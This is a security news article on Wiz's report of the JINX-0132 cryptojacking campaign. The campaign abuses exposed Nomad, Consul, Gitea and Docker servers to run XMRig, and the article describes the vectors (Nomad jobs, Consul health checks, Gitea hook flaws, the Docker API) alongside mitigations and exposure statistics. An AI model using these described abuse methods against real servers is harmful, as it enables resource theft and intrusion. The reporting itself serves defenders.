A cryptojacking campaign is targeting DevOps web servers of Docker, HashiCorp Nomad, HashiCorp Consul and Gitea,
the Wiz Threat Research team reported Monday.
The attackers, tracked as JINX-0132, leveraged misconfigurations or vulnerabilities that leave DevOps servers internet-exposed and susceptible to malicious deployment of the open-source XMRig cryptomining software.
The Wiz researchers noted that the attacks leave few unique indicators of compromise (IOCs) to identify the specific threat actor. Rather than downloading any custom malware from an attacker-controlled server, JINX-0132 downloads XMRig directly from its public GitHub repository.
The attacks were also highlighted as the first publicly reported exploitation of HashiCorp Nomad misconfigurations as an attack vector in the wild, according to Wiz.
“[…] certain affected Nomad instances manage hundreds of clients, with combined CPU and RAM resources that would cost tens of thousands of dollars per month. This highlights how even large organizations with substantial budgets can still be vulnerable to basic misconfigurations,” the Wiz researchers wrote.
How attackers can use your DevOps server for cryptomining
JINX-0132 attackers rely on insecure configurations or vulnerable software versions to hijack DevOps web servers and download XMRig to mine Monero.
Notably, HashiCorp Nomad and Consul are not secure-by-default, placing responsibility on the user to properly configure their instance to avoid misuse by attackers like JINX-0132.
HashiCorp Nomad is a simple scheduler and orchestrator tool that developers can use to deploy and manage containers and non-containerized applications. By default, jobs can be added to Nomad’s job queue by anyone with access to the Nomad server API.
This default configuration was abused by JINX-0132 to create multiple jobs on exposed servers, which downloaded, unpacked and executed the most recent version of XMRig from GitHub. The malicious tasks had seemingly random names, made up of lowercase letters.
The only unique IOCs were a specific task group name and Monero wallet address, which could easily be replaced by the attacker in future campaigns, the researchers noted.
To prevent Nomad attacks, users should follow
HashiCorp security recommendations and activate security features such as access control lists (ACLs) to prevent unauthenticated job creation.
Consul, HashiCorp’s service networking solution, was exploited in a less direct method, with JINX-0132 hijacking the service health check feature. The feature allows a bash command to be executed during a health check, which can be exploited to enable remote code execution (RCE).
By default, any user with remote access to the server can register a health check and include potentially malicious bash commands, as JINX-0132 did in its cryptojacking campaign. Like with Nomad, users can prevent this by utilizing HashiCorp security features and ACLs to allow only authorized users to register health checks.
Gitea, an open-source, self-hosted Git service, often used as an alternative to GitHub or GitLab, was also targeted in the campaign through an unknown method, although Wiz highlights multiple potential ways these servers can be exploited.
First, attackers can exploit the issue tracked as
CVE-2020-14144, where the “DISABLE_GIT_HOOKS” flag is set to “false” by default in Gitea versions 1.1.0 through 1.12.5. This would enable any user who has permission to create git hooks to also add a post-receive script that runs with Gitea’s operating system privileges, Wiz explained.
While CVE-2020-14144 exploitation would require the attacker to already have a certain level of permission, a different flaw in the short-lived 1.4.0 version of Gitea could enable unauthenticated RCE, according to Wiz.
This flaw, which was fixed in version 1.4.1 and was never assigned a CVE, would allow an attacker to exploit the git hook mechanism by writing a Large File Storage (LFS) object without authentication, performing path traversal to read “../../../custom/conf/app.ini” and create an admin session, the Wiz team explained.
Additionally, if the Gitea instances has “INSTALL_LOCK” set to “false,” an attacker with access to the instance can re-run the installation wizard to reset credentials and overwrite the configuration. Wiz recommends configuring Gitea to properly restrict the ability to create git hooks, locking the installer, and ensuring the vulnerable version 1.4.0 is not being used.
Lastly, Wiz noted that when the Docker API is configured to be exposed to the internet, attackers can easily perform actions as though they had access to the root-owned Docker Command Line Interface and achieve malicious RCE. As the Docker API is designed to be an internal service by default, Wiz cautions against altering configurations that potentially expose the API to attackers.
25% of cloud environments host targeted DevOps tools
The DevOps tools targeted by JINX-0132 were noted by Wiz to be present across a quarter of all cloud environments, with HashiCorp Consul alone running on more than 20% environments. Out of these environments, about 5% were found to be exposed to the internet, and 30% of the internet-exposed instances were found to be misconfigured.
A Shodan search performed by Wiz of the targeted HashiCorp tools revealed more than 6,700 total instances exposed to the internet, including more than 2,600 in China and more than 850 in the United States.
Misconfigured developer tools are frequently targeted by cryptojackers aiming to leverage enterprises’ computing power for profit. For example, misconfigured Docker APIs were targeted in an
April 2025 campaign identified by Darktrace and Cado Security labs, and
nine malicious Visual Code Studio extensions were found to facilitate cryptojacking in a campaign identified by ExtensionTotal the same month.
XMRig is frequently misused in these campaigns, with the open-source Monero mining tool being easily accessible and customizable by attackers.
